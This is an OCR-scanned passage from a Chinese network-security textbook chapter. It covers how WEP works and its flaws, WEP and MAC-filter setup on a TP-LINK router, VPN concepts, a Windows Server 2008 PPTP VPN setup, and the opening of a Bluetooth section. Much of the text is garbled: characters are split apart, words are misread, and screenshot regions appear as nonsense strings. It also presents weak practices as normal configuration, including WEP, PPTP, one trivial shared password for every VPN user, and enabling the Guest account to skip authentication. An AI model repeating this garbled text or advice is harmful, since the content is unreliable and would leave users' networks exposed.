(3) 防止 数据 被 攻击 者 中 途 恶意 算 改 或 伪造 。 

WEP 加 密 采用 静态 的 保密 密 钥 ， 各 WLAN 终端 使 用 相同 的 密 钥 访问 无 线 网 络 。WEP 
也 提供 认证 功能 ， 当 加 密 机 制 功能 启用 ， 客 户 端 要 尝试 连接 上 AP 时 ，AP 会 发 出 一 个 
Challenge Packet 给 客户 端 ,客户 端 再 利用 共享 密 钥 将 此 值 加 密 后 ， 送 回 存 取 点 以 进行 认证 
比 对 ， 如 果 正 确 无 误 ， 才 能 获准 存 取 网 络 的 资源 。40 位 WEP 具有 很 好 的 互 操作 性 ， 所 有 
通过 Wi-Fi 组 织 认 证 的 产品 都 可 以 实现 WEP 互 操作 。 现 在 的 WEP 也 一 般 支 持 128 位 的 钥 
匙 ， 提 供 更 高 等 级 的 安全 加 密 。 

2. WEP 的 原理 


WEP 加 密 算 法 的 过 程 示意 图 如 图 9-8 所 示 。 
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9-8 WEP 加 密 过 程 


(1) 在 发 送 端 ，WEP 首先 利用 一 种 综合 算法 对 MAC 帧 中 的 帧 体 字 段 进 行 加 密 ， 生 成 
4 字 节 的 综合 检测 值 。 检 测 值 和 数据 一 起 被 发 送 ， 在 接收 端 对 检测 值 进行 检查 ， 以 监视 非 
法 的 数据 改动 。 

(2) WEP 程序 将 共用 密 钥 输入 伪 随 机 数 生成 器 生成 一 个 键 序 , 键 序 的 长 度 等 于 明文 和 
综合 检测 值 的 长 度 。 

(3) WEP 对 明文 和 综合 检测 值 进行 模 二 加 运算 ， 生 成 密 文 ， 完 成 对 数据 的 加 密 。 伪 随 
机 数 生成 器 可 以 完成 密 钥 的 分 配 ， 因 为 每 台 终端 只 用 到 共用 密 钥 ， 而 不 是 长 度 可 变 的 键 序 。 

(4) 在 接收 端 ，WEP 利用 共用 密 钥 进行 解密 ， 复 原 成 原先 用 来 对 帧 进行 加 密 的 键 序 。 

(5) 工作 站 计算 综合 检测 值 ， 随 后 确认 计算 结果 与 随 帧 一 起 发 送 来 的 值 是 否 匹 配 。 如 
果 综 合 检测 失败 ， 工 作 站 不 会 把 MSDU( 介 质 服务 单元 ) 送 到 LLC( 逻 辑 链 路 控制 ) 层 ， 并 向 
MAC 管理 程序 发 回 失败 声明 。 


3. WEP 的 缺陷 


WEP 是 目前 最 普遍 的 无 线 加 密 机 制 , 但 同样 也 是 较为 脆弱 的 安全 机 制 , 存在 许多 缺陷。 

1) ”缺少 密 钥 管理 

用 户 的 加 密 密 钥 必 须 与 AP 的 密 钥 相同 ， 并 且 一 个 服务 区 内 的 所 有 用 户 都 共享 同一 把 
密 铀 。WEP 标准 中 并 没有 规定 共享 密 钥 的 管理 方案 ,通常 是 手工 进行 配置 与 维护 。 由 于 同 
时 更 换 密 钥 的 费时 与 困难 , 所 以 密 钥 通常 长 时 间 使 用 而 很 少 更 换 ， 倘 若 一 个 用 户 丢 失 密 钥 ， 
则 将 珊 及 整个 网 络 。 

2) ICV 算法 不 合适 

WEP ICV 是 一 种 基于 CRC-32 的 用 于 检测 传输 噪声 和 普通 错误 的 算法 。CRC-32 是 信 
息 的 线性 函数 ， 这 意味 着 攻击 者 可 以 算 改 加 密 信息 ， 并 很 容易 地 修改 ICV， 使 信息 表面 看 
起 来 是 可 信 的 。 能 够 算 改 即 加 密 数据 包 ， 使 各 种 各 样 的 非常 简单 的 攻击 成 为 可 能 。 

3) ”RC4 算法 存在 弱点 

在 RC4 中 ， 人 们 发 现 了 弱 密 钥 。 所 谓 弱 密 钥 ， 就 是 密 钥 与 输出 之 间 存 在 超出 一 个 好 密 
码 所 应 具有 的 相关 性 。 在 24 位 的 IV 值 中 ， 有 9 000 多 个 弱 密 钥 。 攻 击 者 收集 到 足够 多 的 
使 用 弱 密 钥 的 包 后 ， 就 可 以 对 它们 进行 分 析 ， 只 需 尝试 很 少 的 密 钥 就 可 以 接 入 到 网 络 中 。 


9.3.2 ”WEP 在 无 线路 由 器 上 的 应 用 


目前 ， 基 本 上 所 有 的 无 线 设备 都 支持 WEP。 下 面 我 们 就 以 TP-LINK 公司 的 无 线 宽带 
路 由 器 TL-WR641G 和 无 线 网 卡 TL-WN620G 为 例 ， 讲 解 无 线 网 络 WEP 加 密 应 用 。 
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1. 无 线路 由 器 配置 


(1) 启用 WEP 加 密 。 

选择 “无 线 设 置 ”一 “基本 设置 ”， 打 开路 由 器 管理 界面 ， 如 图 9-9 所 示 。 

“安全 认证 类 型 ”选择 “自动 选择 ”选项 ， 因 为 “自动 选择 ”就 是 在 “开放 系统 ”和 
“共享 密 钥 ”之 中 自动 协商 一 种 ， 而 这 两 种 的 认证 方法 的 安全 性 没有 什么 区 别 。 

“ 密 钥 格式 选择 ”选择 “16 进 制 ” 选 项 ， 还 有 可 选 的 是 “ASCIE 码 ”， 这 里 的 设置 对 
安全 性 没有 任何 影响 ， 因 为 设置 “单独 密 钥 ”的 时 候 需 要 “16 进 制 ”， 所 以 这 里 推荐 使 用 
“16 进 制 ”。 
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9-9 无 线 网 络 基本 设置 


“ 密 钥 选择 ”必须 填 入 “ 密 钥 2” 的 位 置 ， 这 里 一 定 要 这 样 设置 ， 因 为 在 新 的 升级 
程序 下 ， 密 钥 1 必须 为 空 ， 目 的 是 为 了 配合 单独 密 钥 的 使 用 (单独 密 钥 会 在 下 面 的 MAC 
地 址 过 滤 中 介绍 )， 不 这 样 设置 的 话 可 能 会 连接 不 上 。 密 钥 类 型 选择 64/128/152 位 ， 选 择 
了 对 应 的 位 数 以 后 “ 密 钥 类 型 ”的 长 度 会 变更 ， 本 例 中 我 们 填 入 了 128 位 参数 
11111111111111111111111111。 因 为 “ 密 钥 格 式 选 择 ” 为 “16 进 制 ”， 所 以 “ 密 钥 内 容 ” 
可 以 填 入 的 字符 是 0、1、2、3、4、5、6、7、8、9、a、b、c、d、e、f， 设 置 完 记得 保存 。 

如 果 不 需 要 使 用 “单独 密 钥 ” 功 能 ， 网 卡 只 需要 简单 配置 成 加 密 模 式 的 密 钥 格式 ， 密 
钥 内 容 要 和 路 由 器 一 样 ， 密 钥 设置 也 要 设置 为 “WEP 密 钥 2” 的 位 置 ( 和 路 由 器 对 应 )， 这 
时 候 就 可 以 连接 上 路 由 器 了 。 

(2) 单独 密 钥 的 使 用 。 

这 里 的 MAC 地 址 过 滤 可 以 指定 某 些 MAC 地 址 ,可 以 访问 本 无 线 网 络 而 其 他 的 不 可 以 ， 
“单独 密 钥 ”功能 可 以 为 单个 MAC 指定 一 个 单独 的 密 钥 , 这 个 密 钥 就 只 有 带 这 个 MAC 地 
址 的 网 卡 可 以 用 ， 其 他 网 卡 不 能 用 ， 增 加 了 一 定 的 安全 性 。 

选择 “无 线 设置 ”一 “MAC 地 址 过 滤 ” 选 项 ， 在 “无 线 网 络 MAC 地 址 过 滤 设 置 ” 界 
面 中 添加 新 条 目 ， 如 图 9-10 所 示 。 
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图 9-10 无 线 网 络 MAC 地 址 过 滤 设 置 


“MAC 地 址 ”参数 我 们 填 入 的 是 本 例 中 TL-WN620G 的 MAC 地 址 : 00-0A-EB-A3-2C- 
E5，“ 类 型 ”可 以 选择 “人 允许”/“ 禁 止 ”/“64 位 密 钥 ”/“128 位 密 钥 ”/“152 位 密 钥 ”， 
本 例 中 选择 了 “64 位 密 钥 ”。“ 人 允许 ”和 “禁止 ”只 是 简单 允许 或 禁止 某 一 个 MAC 地 址 
的 通过 ， 这 与 之 前 的 MAC 地 址 功能 是 一 样 的 。 

“ 密 钥 ” 填 入 了 10 位 AAAAAAAAAA ， 这 里 没有 “ 密 钥 格 式 选择 ”， 只 支持 “16 
进 制 ” 的 输入 。 

“状态 ”选择 “生效 ”。 

最 后 单 击 “ 保 存 ” 即 可 ， 保 存 后 会 返回 上 一 级 界面 ， 结 果 如 图 9-11 所 示 。 

[omaucaite | 


本 页 设置 WAC 塌 址 过 滩 示 控制 + 算 机 对 本 无 本 F809 廊 同 。 
福音 :64 位 密 幅 、!28 位 窑 由 和 152 位 窗外 (16 渤 制 式 ) 只 有 在 安全 认证 方式 力 开 
肯 系 统 、 共 训 在 角 阴 目 动 先天 而 且 设 轩 默认 帮 怕 8j 才 有 效 《 否则 讽 力 多 许 通 过 ) 
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图 9-11 MAC 地 址 过 滤 功 能 开启 显示 


注意 到 上 面 的 “MAC 地 址 过 滤 功 能 ”的 状态 是 “已 开启 ”， 如 果 是 “已 关闭 ”， 右 边 
的 按钮 会 变 成 “开启 过 滤 ”， 单 击 这 个 按钮 来 开启 这 一 功能 。 至 此 ， 无 线路 由 器 这 一 端 配 
置 完成 。 

(3) 获取 网 卡 MAC 地 址 的 方法 。 

通过 计算 机 DOS 界面 运行 ipconfig/all 这 个 命令 会 弹出 如 下 类 似 信息 ， 红 线 勾 勒 部 分 
“Physical Address” 对 应 的 就 是 处 于 连接 状态 的 网 卡 的 MAC 地 址 ， 如 图 9-12 所 示 。 


2. 网 卡 TL-WN620G 的 配置 


打开 TL-WN620G 客户 端 应 用 程序 主 界面 一 “用 户 配 置 文件 管理 ”一 “修改 ”按钮 ， 
会 弹出 “用 户 配置 文件 管理 ”对 话 框 。 首 先是 “常规 ”页 填 入 和 无 线路 由 器 端 相 同 的 
SSID1 一 一 本 例 为 “TP-LINK” ， 如 图 9-13 所 示 。 
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图 9-13 用 户 配置 文件 管理 常规 选项 

然后 单 击 “ 高 级 ”选项 卡 ， 红 线 色 勒 部 分 注意 选择 认证 模式 ， 可 以 保持 和 无 线路 由 器 
端 相 同 ， 由 于 我 们 的 路 由 器 上 选择 了 “自动 选择 ”模式 ， 所 以 这 里 无 论 选择 什么 模式 都 是 
可 以 连接 的 。 

如 果 这 个 选项 是 灰色 ， 就 请 先 配 置 “ 安 全 ”页 面 的 参数 ， 回 过 头 再 来 这 里 配置 ， 如 
图 9-14 所 示 。 

接 下 来 我 们 进入 “安全 ”页 ， 如 图 9-15 所 示 。 

先 选择 “ 预 共享 密 钥 (静态 WEP)”， 然 后 单 击 “ 配 置 ”按钮 ， 进 入 设置 共享 密 钥 的 界 
面 ， 如 图 9-16 所 示 。 
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图 9-14 用 户 配 置 文件 管理 高 级 选项 卡 


图 9-16 设置 共享 密 钥 


将 图 9-16 中 用 红线 勾勒 的 参数 说 明 一 下 。 

(1) “ 密 钥 格式 ”必须 选择 “十 六 进 制 (0-9，A-F)”。 

(2) 总 共 需 要 填 入 两 个 密 钥 : 密 钥 1 对 应 的 是 路 由 器 “无 线 配置 ”一 “MAC 地 址 过 滤 ” 
页 面 下 设置 的 单独 密 钥 ， 本 例 为 64 位 长 度 的 密 钥 AAAAAAAAAA; 密 钥 2 对 应 的 是 路 由 
器 “无 线 配置 ”一 “基本 设置 ”页 面 下 设置 的 公共 密 钥 ， 本 例 为 128 位 长 度 的 密 钥 : 
11111111111111111111111111 。 

(3) 最 后 要 选中 “WEP 密 钥 1”( 注 意 单 击 “WEP 密 钥 1” 后 面 的 圆 )。 

(4) 单独 密 钥 和 公共 密 钥 的 位 置 是 不 能 更 改 的 。 

配置 完成 ， 双 击 “ 确 定 ” 回 到 客户 端 应 用 程序 主 界面 ， 我 们 可 以 看 到 网 卡 和 无 线路 由 
器 已 经 建立 了 连接 ， 如 图 9-17 所 示 。 


图 9-17 网 卡 和 无 线路 由 器 建立 连接 界面 


(> 计算 机 网 络 安全 (第 2 版) 


堂 沙 若 特性 ”十 水 人 鹤 FH 台 强 台 


再 进入 路 由 器 “无 线 设置 ”一 “主机 状态 ”， 可 以 看 到 已 连接 的 网 卡 MAC 地 址 ， 在 
“无 线 网 络 主机 状态 ”界面 , 表 里 第 一 个 显示 的 是 无 线路 由 器 的 MAC 地址 , 如 图 9-18 所 示 。 


本 页 显示 连接 到 本 无 线 网 络 的 所 有 主机 的 基本 信息 - 


当前 连接 的 主机 数量 : 2 EE 
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图 9-18 无 线 网 络 主机 状态 
9.4 无 线 VPN 技术 


随 着 无 线 网 络 的 普及 , 对 其 管理 和 安全 使 用 也 提出 了 更 高 的 要 求 。 利用 无 线 VPN 技术 
是 最 佳 的 选择 之 一 ， 下 面 对 其 作 简单 介绍 。 


9.4.1 无 线 VPN 技术 


1. VPN 的 特点 


VPN 可 以 利用 公共 网 络 来 构建 的 私人 专用 网 络 技术 ， 虽 然 不 是 真 的 专用 网 络 ， 但 却 能 
够 实现 专用 网 络 的 功能 。IETF 草案 理解 基于 IP 的 VPN 为 :“ 使 用 卫 机 制 仿真 出 一 个 私有 
的 广域网 ”是 通过 私有 的 隧道 技术 ， 在 公共 数据 网 络 上 仿真 一 条 点 到 点 的 专线 技术 。 所 谓 
虚拟 , 是 指 用 户 不 再 需要 拥有 实际 的 长 途 数据 线路 ,而 是 使 用 Intemet 公众 数据 网 络 的 长 途 
数据 线路 。 所 谓 专用 网 络 ， 是 指 用 户 可 以 为 自己 制定 一 个 最 符合 自己 需求 的 网 络 。 

2. VPN 的 安全 性 


目前 VPN 主要 采用 四 项 技术 来 保证 安全 ， 这 四 项 技术 分 别 是 隧道 技术 (Tunneling)、 加 
解密 技术 (Encryption & Decryption)、 密 钥 管理 技术 (Key Management)、 使 用 者 与 设备 身份 
认证 技术 (Authentication)。 

1) ”隧道 技术 

隧道 技术 是 VPN 的 基本 技术 ,类似 于 点 对 点 连接 技术 , 它 在 公用 网 建立 一 条 数据 通道 
(隧道 )， 让 数据 包 通过 这 条 隧道 传输 。 隧 道 是 由 隧道 协议 形成 的 ， 分 为 第 二 、 三 层 隧道 协 
议 。 第 二 层 隧 道 协议 是 先 把 各 种 网 络 协议 封装 到 PPP 中 , 再 把 整个 数据 包装 入 隧道 协议 中 。 
这 种 双 层 封装 方法 形成 的 数据 包 靠 第 二 层 协议 进行 传输 。 第 二 层 隧道 协议 有 L2F、PPTP、 
L2TP 等 。L2TP 协议 是 目前 IETF 的 标准 ， 由 IETF 融合 PPTP 与 L2F 而 形成 。 第 三 层 隧道 
协议 是 把 各 种 网 络 协议 直接 装 入 隧道 协议 中 ， 形 成 的 数据 包 依 靠 第 三 层 协议 进行 传输 。 第 
三 层 隧 道 协议 有 VTP、IPSec 等 。 IPSec(IP Security) 是 由 一 组 RFC 文档 组 成 ， 定 义 了 一 个 系 
统 来 提供 安全 协议 选择 、 安 全 算法 ， 确 定 服务 所 使 用 密 钥 等 服务 ， 从 而 在 人 P 层 提供 安全 
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保障 。 

2) ”加 解密 技术 

加 解密 技术 是 数据 通信 中 一 项 较 成 熟 的 技术 ，VPN 可 直接 利用 现 有 技术 。 

3) ” 密 钥 管 理 技 术 

密 钥 管 理 技术 的 主要 任务 是 如 何在 公用 数据 网 上 安全 地 传递 密 钥 而 不 被 窃取 。 现 行 密 
钥 管 理 技术 又 分 为 SKIP 与 I SAKMP/OAKLEY 两 种 。 SKIP 主要 是 利用 Diffie-Hellman 的 演 
算法 则 ， 在 网 络 上 传输 密 钥 ; 在 ISAKMP/OAKLEY 中 ， 双 方 都 有 两 把 密 钥 ， 分 别 用 于 公 
用 、 私 用 。 

人 ”使 用 者 与 设备 身份 认证 技术 

使 用 者 与 设备 身份 认证 技术 最 常用 的 是 使 用 者 名 称 与 密码 或 卡片 式 认证 等 方式 ,目前 
这 方面 做 的 比较 成 熟 的 有 国内 的 深信 福 科技 的 VPN 解决 方案 。 

3. VPN 网 络 的 可 用 性 


通过 VPN， 企 业 可 以 以 更 低 的 成 本 连接 远程 办 事 机 构 、 出 差 人 员 以 及 业务 合作 伙伴 关 
键 业务 。 虚 拟 网 组 成 之 后 ， 远 程 用 户 只 需 拥有 本 地 ISP 的 上 网 权限 ， 就 可 以 访问 企业 内 部 
资源 ， 这 对 于 流动 性 大 、 分 布 广泛 的 企业 来 说 很 有 意义 ， 特 别 是 当 企业 将 VPN 服务 延伸 到 
合作 伙伴 方 时 ， 便 能 极 大 地 降低 网 络 的 复杂 性 和 维护 费用 。 

VPN 技术 的 出 现 及 成 熟 为 企业 实施 ERP、 财 务 软件 、 移 动 办 公 提 供 了 最 佳 的 解决 方案 。 

一 方面 , VPN 利用 现 有 互联 网 , 在 互联 网 上 开拓 隧道 , 充分 利用 企业 现 有 的 上 网 条 件 ， 
无 须 申 请 昂贵 的 DDN 专线 ， 运 营 成 本 低 。 另 一 方面 ，VPN 利用 了 SEC 等 加 密 技术 ， 使 在 
通道 内 传输 的 数据 ， 有 着 高 达 168 位 的 加 密 措施 ,充分 保证 了 数据 在 VPN 通道 内 传输 的 安 
全 性 。 

4. VPN 网 络 的 可 管理 性 


随 着 技术 的 进步 ， 各 种 VPN 软 硬 件 解决 方案 都 包含 了 路 由 、 防 火 墙 、VPN 网 关 等 三 
方面 的 功能 ， 企 业 或 政府 通过 购买 VPN 设备 ， 达 到 一 物 多 用 的 功效 ， 既 满足 了 远程 互联 的 
要 求 ， 而 且 还 能 在 相当 程度 上 防止 黑客 的 攻击 、 并 能 根据 时 间 、IP、 内 容 、Mac 地 址 、 服 
务 内 容 、 访 问 内 容 等 多 种 服务 来 限制 企业 公司 内 部 员工 上 网 时 的 行为 ， 一 举 多 得 。 

VPN 设备 的 安装 调试 、 管 理 、 维 护 都 极为 简单 ， 而 且 都 支持 远程 管理 ， 大 多 数 VPN 
硬件 设备 甚至 可 通过 中 央 管理 器 进行 集中 式 的 管理 维护 。 出 差 人 员 也 可 以 通过 客户 端 软件 
与 中 心 的 VPN 设备 建立 VPN 通道 ， 从 而 达到 访问 中 心 数据 等 资源 的 目的 。 让 互联 无 处 不 
在 ， 极 大 地 方便 了 企业 及 政府 的 数据 、 语 音 、 视 频 等 方面 的 应 用 。 


9.4.2 Windows Server 2008 的 VPN 服务 器 搭建 


下 面 介绍 一 下 通过 Windows Server 2008 操作 系统 自 带 的 路 由 和 远程 访问 功能 来 实现 
NAT 共享 上 网 和 VPN 网 关 的 功能 。 通 过 本 实例 加 深 对 无 线 VPN 技术 的 理解 。 
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我 们 的 目标 是 要 实现 在 异地 通过 VPN 客户 端 访问 总 部 局 域 网 各 种 服务 器 资源 。 网 
络 拓 扑 示 意图 如 图 9-19 所 示 。 


分 支 机 构 | 其 他 机 构 局 域 网 


图 9-19 无 线 VPN 拓扑 结构 图 
1. 安装 “远程 和 路 由 服务 ” 


在 Windows Server 2008 R2 上 配置 PPTP VPN Sever， 必 须 先 通过 服务 器 管理 器 添加 角 
色 来 开启 “远程 和 路 由 服务 ”功能 (默认 是 关闭 的 )， 在 服务 器 角色 中 选中 “网 络 策略 和 访 
问 服务 ” 复 选 框 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 图 9-20 所 示 。 


< 上 -#0) EE LE 


图 9-20 选中 “网 络 策略 和 访问 服务 ” 复 选 杠 
在 打开 的 “选择 角色 服务 ”界面 中 ， 选 中 “路 由 和 远程 访问 服务 ” 复 选 框 ， 单 击 “ 下 
一 步 ”按钮 安装 ， 如 图 9-21 所 示 。 安 装 成 功 后 单 击 “ 关 闭 ” 按 钮 ， 如 图 9-22 所 示 。 
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图 9-21 选中 “路 由 和 远程 访问 服务 ” 复 选 框 
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图 9-22 安装 成 功 界面 
2. 启用 “路 由 与 远程 访问 服务 ” 
单 击 管理 工具 一 路 由 与 远程 访问 (或 者 在 安装 完 此 服务 后 会 自动 出 现 配置 并 启用 路 由 
和 远程 访问 的 界面 )， 右 击 服务 器 名 配置 并 启用 路 由 和 远程 访问 ， 如 图 9-23 所 示 。 
打开 “路 由 和 远程 访问 服务 器 安装 向 导 ” 界 面 ， 单 击 “ 下 一 步 ”按钮 。 选 中 “远程 访 
问 ” 单 选 按钮 ， 并 单 击 “ 下 一 步 ”按钮 ， 如 图 9-24 所 示 
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三 器 由 和 远程 访问 LED 
文件 0) 操作 查看 W 帮助 00 


和 远程 访问 服务 器 
由 和 元 程 访问 ,请 在 “操作 ” 莱 羊 上 单 证 “要 置 并 言 用 路 由 和 


图 9-24 ”选中 “远程 访问 ” 单 选 按钮 
选中 VPN 单 选 按钮 ， 单 击 “ 下 一 步 ”按钮 ， 如 图 9-25 所 示 。 安 装 完成 之 后 选择 “ 启 
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3. 配置 VPN 服务 器 
右 击 服务 器 名 ， 选 择 “ 属 性 ”命令 ， 如 图 9-26 所 示 。 


文件 四 可 作 内 全 看 史 者 辆 9 
名 四 证 后 | 其 司 <| 目 下 | 


图 9-26 选择 “属性 ”命令 
在 属性 窗口 中 选择 IPv4 选项 卡 ， 配 置 分 配给 拨 入 客户 端的 VPN 地 址 池 ， 选 中 “静态 
地 址 池 ” 单 选 按钮 ， 单 击 “ 添 加 ”按钮 ， 将 一 定 范围 的 未 被 占用 的 内 网 地 址 划 入 地 址 池 。 
将 地 址 池 设 为 192.168.200.6 至 192.168.200.200， 单 击 “ 确 定 ” 按 钮 ， 如 图 9-27 所 示 。 


本 地 ) 属性 
| 全 Jive nee | rmr | 日 志 记录 | 


末 。 往 入 一 个 起 析 TF 地 址 ， 和 结束 I 地 让 或 国 中 从 地址 数 。 


使 

适 | am 4 hei a0.6 
结束 TP 地 址 加 )、 192 .168 200 20 
地 址 数 0 


图 9-27 设置 IPv4 地 址 范围 
4. 添加 VPN 拨 入 用 户 
为 了 便于 区 分 终端 需要 为 每 个 终端 指定 不 同 的 可 识别 的 VPN 拨 入 用 户 , 例如 美国 纽约 
的 终端 分 配 用 户 名 为 : USA_NewYork; 密码 统一 设置 为 vpn123456789。 添 加 VPN 拨 入 用 
户 ， 在 服务 器 管理 器 “本 地 用 户 和 组 ”的 “用 户 ” 目 录 下 添加 用 户 “USA_NewYork” 并 配 
置 拨 入 VPN 时 的 密码 ， 如 图 9-28 所 示 。 
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计算 机 管理 
立 件 Tf】 要 作风” 坪 丰 中 鞭 助 tp 
争 中 | 为 后 轩 也 四 | 司 


EE 
hnin tr 管理 H+ 其 妃 拒 ) 的 启 千 焚 户 
[ra 


9-28 ”创建 新 用 户 


双击 用 户 名 “USA_NewYork”， 弹 出 用 户 属性 设置 对 话 框 ， 选 择 “ 拨 入 ”选项 卡 ， 选 
中 “允许 访问 ”， 进 行 如 图 9-29 所 示 配置 。 
cay 至 理 W) 部 胞 0] 
加 中 | 发 加 |X 曲 2 日 | 


8) 广 设置 仅 基 出 和 过 要 询 间 从) 5) 
Ri) 


分 本 生态 工 地 让 to) 


如 者。 
厂 应 用 荐 坊 荐 让 gg) 
| 让 入 这 楼 宝 义 委 记 有 9 由。 | 


图 9-29 设置 “ 拨 入 ”选项 卡 
通过 上 述 步骤 ， 在 Windows Server 2008 R2 上 的 PPTP VPN Server 端 即 完成 配置 。 
5. 创建 VPN 网 络 连接 


尽管 VPN 网 络 连 接 创 建 工 作 比 较 简 单 ， 但 是 由 于 Windows Server 2008 系统 是 一 种 全 
新 的 操作 系统 ,在 该 系统 环境 下 创建 VPN 网 络 连接 的 操作 步骤 与 以 往 有 所 不 同 ， 具 体 步 又 
如 下 。 

首先 以 超级 管理 员 权限 登录 进入 Windows Server 2008 系统 ,打开 该 系统 桌面 中 的 “ 开 
始 ” 菜 单 ， 从 中 依次 选择 “设置 ”一 “控制 面板 ”命令 ， 在 其 后 出 现 的 系统 控制 面板 窗口 
中 ， 用 鼠标 双击 “网 络 和 共享 中 心 ” 图 标 ， 打 开 对 应 系统 的 网 络 和 共享 中 心 管理 窗口 。 


- 潼 洲 革 将 和 ”过 溢 开 评 上 H 册 囊 沼 卫 
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其 次 在 网 络 和 共享 中 心 管理 窗口 的 左 侧 显示 区 域 ， 单 击 “ 设 置 连接 或 网 络 ”功能 选项 ， 
打开 VPN 网 络 连接 创建 向 导 对 话 框 ， 依 照 向 导 提示 选中 如 图 9-30 所 示 界 面 中 的 “连接 到 
工作 区 ”选项 ， 同 时 单 击 “ 下 一 步 ”按钮 。 


图 9-30 设置 连接 方式 
按照 网 络 连接 创建 向 导 的 提示 ， 可 以 在 如 图 9-31 所 示 的 向 导 设 置 界面 中 ， 选择“ 使 用 
我 的 Internet 连接 (VPN)” 功 能 选项 ， 这 样 就 能 使 用 现成 的 Intemet 网 络 连接 线路 ， 来 建立 
直接 访问 单位 局 域 网 网 络 的 虚拟 加 密 通 道 了 。 


下 合用 我 的 Interset 话 扒 G7D OD 
通过 Interaet 使 用 虚拟 专用 站 络 y? 功 未 连 撤 


二 直 术 所 吕 0) 
不 二 iaTnteerw 丰 合用 包 活 码 未 得 接 < 
和 

址 如 VON 法拉? 


9-31 设置 连接 方式 


继续 单 击 向 导 对 话 框 中 的 “下 一 步 ”按钮 ， 系 统 屏幕 上 将 会 出 现 一 个 如 图 9-32 所 示 的 
设置 对 话 框 ， 根 据 对 话 框 的 提示 我 们 需要 输入 访问 某 局 域 网 VPN 服务 器 的 卫 地 址 ， 同 时 
需要 为 该 网 络 连接 设置 一 个 合适 的 名 称 ， 在 这 里 我 们 假设 将 该 网 络 连接 名 称 设 置 为 “VPN 
连接 ”， 同 时 将 需要 访问 的 某 公司 局 域 网 VPN 服务 器 IP 地 址 设置 为 “61.155.50.**”， 另 
外 还 在 这 里 选择 了 人 允许 其 他 人 使 用 此 连接 选项 ， 该 功能 选项 允许 任意 一 位 访问 本 地 工作 站 
的 人 使 用 “VPN 连接 ”。 
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图 。 连 桩 到 工作 区 [EE] 
证 连接 到 工作 区 


键入 要 连接 的 Interaet 地 址 
出 各 管 理 郧 可 捍 仪 比 直 址 。 


Ineemet 地 址 Qj: pe 


目标 名 和: Ni 


CJ] _w | 
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在 确认 上 面 的 设置 操作 正确 以 后 ， 再 单 击 “ 下 一 步 ” 按 钮 ， 随 后 我 们 会 看 到 如 图 9-33 
所 示 的 向 导 设置 对 话 框 ， 在 这 里 正确 输入 访问 目标 VPN 服务 器 的 用 户 名 与 密码 ; 需要 注意 
的 是 ， 如 果 我 们 想 对 局 域 网 中 的 目标 VPN 服务 器 进行 一 些 控制 操作 ,需要 在 这 里 输入 系统 
管理 员 权 限 的 账号 名 称 与 密码 , 不 然 的 话 通过 VPN 网 络 连 接 进 入 单位 局 域 网 后 , 访问 目标 
VPN 服务 器 时 容易 出 错 ; 要 是 不 希望 VPN 网 络 访问 需要 进行 身份 验证 时 ， 可 以 尝试 在 目 
标 VPN 服务 器 所 在 的 主机 系统 中 启用 “ 仅 来 宾 ” 网 络 访问 模式 , 并 且 将 该 系统 中 的 “Guest” 
账号 启用 起 来 , 这 样 我 们 日 后 访问 目标 VPN 服务 器 时 , 本 地 客户 端 系统 就 能 自动 以 “Guest” 
账号 去 完成 身份 验证 操作 ， 或 者 使 用 新 创建 的 用 户 登录 。 


高 
站 
室 
: 
材 Case ] ws 
3 图 9-33 输入 用 户 名 和 密码 
系 最 后 单 击 向 导 对 话 框 中 的 “连接 ” 按钮 ， 我 们 就 能 通过 新 创建 的 VPN 网 络 连 接 访问 该 
绰 。 局 域 网 中 的 目标 VPN 服务 器 。 
6. 终端 脚本 修改 


际 漫游 出 访 的 设备 需要 修改 拨号 的 脚本 : usrlocalmbptvtools\createnbptvpn.sh， 将 
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“msrlocalnbpt/tools/createvpn.sh nbptvpn 60.155.50.** nbptvpn " vpn123456789" require- 
mppe-128 defaultroute” 改 为 : “/usr/local/nbpt/tools/createvpn.sh nbptvpn 111.13.2.** 终端 
VPN 用 户 " vpn123456789" require-mppe-128 defaultroute”。111.13.2.** 为 集团 的 VPN 服务 
器 正 ; 终端 VPN 用 户 与 VPN 服务 器 上 为 每 个 终端 创建 的 VPN 用 户 一 致 , 由 国家 和 城市 名 
组 成 。 


7. 测试 端 配置 修改 
修改 测试 端 配 置 文件 : config.xml, 将 <Terminal Id="3" Name="name0001" Type="234"> 


中 的 Name 属性 赋值 为 由 国家 和 城市 名 组 成 的 英文 名 字 , 可 以 和 每 个 终端 的 VPN 用 户 一 致 。 
控制 端 他 修改 为 111.13.2.**。 


9.5 蓝牙 安全 


随 着 计算 机 网 络 和 移动 电话 技术 的 迅猛 发 展 ， 人 们 感到 越 来 越 迫 切 需 要 发 展 小 范围 的 
无 线 数据 与 语音 通信 技术 。 于 是 爱立信 、IBM、 英 特 尔 、 诺 基 亚 和 东芝 等 公司 在 1998 年 联 
合 推出 一 项 新 的 无 线 网 络 技术 ， 即 蓝牙 技术 。 蓝 牙 技术 可 以 解决 小 型 移动 设备 间 的 无 线 互 
连 问题 ， 它 的 硬件 市 场 非常 广阔 ， 涵 盖 了 局 域 网 中 的 各 类 数据 及 语音 设备 ， 如 计算 机 、 移 
动 电话 、 小 型 个 人 数字 助理 (PDA) 等 。 

蓝牙 技术 面向 的 是 移动 设备 间 的 小 范围 连接 ， 从 本 质 上 说 它 是 一 种 代替 电缆 的 无 线 网 
络 技 术 。 为 了 保证 移动 设备 间 数 据 传输 的 安全 性 ,该 技术 持 应 用 层 和 链 路 层 的 鉴 权 和 加 密 ， 
本 节 要 讨论 的 就 是 蓝牙 技术 常见 的 安全 问题 。 


9.5.1 蓝牙 应 用 协议 栈 


1999 年 12 月 1 日 ,Bluetooth SIG(Special Interest Group) 发 布 了 蓝牙 标准 的 最 新 版 :1.0B 
版 。 蓝 牙 标准 包括 两 大 部 分 : Core 和 Profiles。Core 是 蓝牙 的 核心 ， 它 主要 定义 了 蓝牙 的 
技术 细节 ， 而 Profiles 部 分 则 定义 了 在 蓝牙 的 各 种 应 用 中 协议 栈 的 组 成 。 

蓝牙 标准 主要 定义 的 是 底层 协议 ， 同 时 为 保证 和 其 他 协议 的 兼容 性 ， 也 定义 了 一 些 高 
层 协议 和 相关 接口 。 从 ISO 的 OSI 七 层 协议 标准 来 看 ， 蓝 牙 标 准 主要 定义 的 是 物理 层 、 链 
路 层 和 网 络 层 的 结构 。 

(1) 射频 协议 (RF/Radio Protocol): 定义 了 蓝牙 发 送 器 和 接收 器 的 各 个 参数 ， 包 括 发 送 
器 的 调制 特性 ， 接 收 器 的 灵敏 度 、 抗 干扰 性 能 、 互 调 特性 和 接收 信号 强度 指示 等 。 

